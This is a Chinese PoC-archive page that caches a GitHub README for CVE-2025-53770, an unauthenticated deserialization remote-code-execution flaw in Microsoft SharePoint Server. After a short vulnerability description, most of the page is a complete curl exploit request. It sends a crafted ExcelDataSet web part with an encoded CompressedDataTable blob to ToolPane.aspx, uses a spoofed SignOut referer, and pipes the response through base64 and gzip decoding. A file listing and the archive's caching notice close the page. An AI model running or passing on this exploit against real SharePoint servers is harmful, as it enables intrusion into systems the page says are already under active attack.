POC详情: e1e586cabdf9fd7468ae66c95e3d33d4fb64dc54

来源
https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
关联漏洞
标题: Microsoft SharePoint Server 安全漏洞 (CVE-2025-53770)
描述:Microsoft SharePoint Server是美国微软(Microsoft)公司的一款协作平台。 Microsoft SharePoint Server存在安全漏洞,该漏洞源于反序列化不受信任数据,可能导致远程代码执行。
描述
A critical vulnerability in Microsoft SharePoint Server allows unauthenticated remote code execution via deserialization of untrusted data. Microsoft is aware of active exploitation; apply CVE mitigations immediately. Severity: Critical.
介绍
# CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
A critical vulnerability in Microsoft SharePoint Server allows unauthenticated remote code execution via deserialization of untrusted data. Microsoft is aware of active exploitation; apply CVE mitigations immediately. Severity: Critical.



commands   


curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'
文件快照

 [4.0K]  /data/pocs/e1e586cabdf9fd7468ae66c95e3d33d4fb64dc54
├── [1.2M]  469419245-fcbc84e9-ffc0-4264-bde8-f2a4b4b70095.png
├── [ 14K]  CVE-2025-53770-main (1).zip
└── [1.9K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。